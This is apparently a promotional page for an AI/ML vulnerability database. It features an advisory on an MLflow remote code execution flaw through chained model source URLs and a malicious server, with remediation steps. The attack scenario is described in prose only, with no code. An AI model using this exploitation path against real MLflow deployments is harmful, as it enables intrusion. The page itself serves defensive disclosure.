New 81 vulnerabilities published

The First AI/ML Supply Chain Vulnerability Database

Detect, assess and remediate vulnerabilities in your AI/ML supply chain with detailed descriptions & infographics, automated vulnerability scanners and OSS maintainer provided fixes & remediation advice.

Vulnerabilities in PYPI, ML FLow, and ML Ops

AI vulnerabilities that are Actually Impactful

Assess whether a concern is a legitimate threat to your organization with our detailed report analysis, attack scenarios and attack path diagrams. We curate our vulnerability feed to highlight security issues that have real-world impacts on AI applications and ML systems.

Available publicly on Nov 16 2023

10 Critical

mlflow

10

Remote Code Execution via Controlled File Write

Threat overview

The vulnerability stems from the way MLflow processes model source URLs. Specifically, when a model is created with a source URL pointing to another model that, in turn, points to a malicious server, MLflow fetches and writes files as specified by the attacker. This behavior can be exploited to write arbitrary files on the system, leading to remote code execution. The lack of authentication by default and the ability to control the file path and content through a malicious server are key factors that facilitate this exploit.

Attack Scenario

An attacker sets up a malicious server to serve a JSON response that specifies a file path and content. The attacker then creates two models in MLflow: the first model's source points to the malicious server, and the second model's source points to the first model. When MLflow processes the second model, it fetches the file specification from the malicious server and writes the specified file to the system, allowing the attacker to execute arbitrary code.

Who is affected?

Any user or organization running MLflow versions 2.6.0 to 2.9.1 with default configurations is vulnerable to this attack. The vulnerability specifically affects environments where MLflow is used for tracking experiments, packaging code, and sharing and deploying models without requiring authentication.

Remediation that you can rely on

Remediate any vulnerability you face with maintainer-curated fixes and AI application-specific remediation advice. We work directly with the open source community to identify and remediate OSS vulnerabilities that effect AI applications and ML systems.

  1. 1
    Update MLflow to version 2.9.2 or later.
  2. 2
    Ensure that authentication is enabled for MLflow to prevent unauthorized access.
  3. 3
    Regularly review and monitor model creation requests to detect any suspicious activity.
  4. 4
    Consider implementing network-level controls to restrict access to the MLflow server from untrusted sources.

Automated Vulnerability Scanners

Detect vulnerable services in your network by leveraging Nuclei templates to quickly evaluate your attack surface.

Nuclei template hero image

Sightline Premium

Early Access

Get early access to fixed vulnerability before they're publicly disclosed. On average customers get a 31 day early warning before a vulnerability is set to become public.

Protect AI Platform Integration

Immediately see what vulnerabilities matter most by combining the context of your AI applications MLBOM (provided by Radar) with Sightline

Unlimited Access to Scanners

Leverage our Scanners immediately as they're released on Sightline Premium, instead of waiting for them to eventually get in to the public Vulnerability Feed.

API Access

Integrate our Vulnerability Feed in your existing workflows and tools by leveraging our API built upon the OSSF's Open Source Vulnerability standard.

Many eyes make all bugs shallow

Sightline is powered by our Huntr community - the world's first bug bounty board for AI/ML.
Together, we have helped protect AI by working with over 15k security researchers and maintainers who have earned over $500k finding & fixing vulnerabilities.

171

Vulnerabilities identified in the last 90 days

56

Vulnerabilities that are not yet public

35

Avg. days customers have had early access

Learn more about Huntr